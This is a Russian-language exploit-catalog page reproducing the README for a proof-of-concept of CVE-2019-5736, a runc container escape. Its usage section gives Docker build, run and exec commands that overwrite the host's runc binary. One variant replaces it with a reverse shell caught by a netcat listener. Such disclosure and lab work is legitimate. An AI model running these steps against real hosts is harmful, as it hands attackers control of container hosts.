Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
POC-CVE-2019-5736 — Эксплойт-доказательство концепции для CVE-2019-5736, демонстрирующий побег из контейнера через перезапись бинарного файла runc с помощью exec и полезных нагрузок вредоносного образа. | Kitploit
Инструменты/GitHubGitHub/bbrathnayaka/poc-cve-2019-5736
Безопасность контейнеровГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияRed TeamingПобег из Контейнера
GitHubbbrathnayaka/poc-cve-2019-5736

POC-CVE-2019-5736

Эксплойт-доказательство концепции для CVE-2019-5736, демонстрирующий побег из контейнера через перезапись бинарного файла runc с помощью exec и полезных нагрузок вредоносного образа.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
16 лет назадЕщё не проверено

RunC-CVE-2019-5736

Build Status Build Status Build Status Build Status Build Status


Видео: https://bit.ly/2WqvILb

Статья в блоге: [www.idealhax.blogspot.com/2020/05/breaking-out-of-docker-via-runc.html]

Здесь я хотел бы упомянуть, что оригинальный разработчик этого эксплойта — Юваль Авраами (Yuval Avrahami) из Twistlock Labs.

Запуск POC

Обратите внимание: запуск POC приведет к перезаписи бинарного файла runC на хосте.

Настоятельно рекомендуется сделать копию вашего бинарного файла runC (обычно находится в /usr/sbin/runc) перед запуском одного из POC.

Клонируйте репозиторий:

root@kitploit:~
$ git clone [email protected]:BBRathnayaka/RunC-CVE-2019-5736.git

Exec POC

Перезаписывает runc простой программой, которая выводит строку.

Запуск exec POC:

root@kitploit:~
$ docker build -t cve-2019-5736:exec_POC ./RunC-CVE-2019-5736/exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash

Malicious Image POC

Перезаписывает runc простым bash-скриптом обратной оболочки, который подключается к localhost:2345.

Прослушивание обратной оболочки:

root@kitploit:~
$ nc -nvlp 2345

Из другой оболочки запустите POC вредоносного образа:

root@kitploit:~
$ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC

Ссылки

root@kitploit:~
См. [Twistlock Labs](https://www.twistlock.com/labs-blog/breaking-docker-via-runc-explaining-cve-2019-5736/ "Объяснение CVE-2019-5736") для объяснения CVE-2019-5736 и POC.

POC вредоносного образа во многом основан на [POC от q3k](https://github.com/q3k/cve-2019-5736-poc), поэтому вся заслуга принадлежит ему.
Скачать инструмент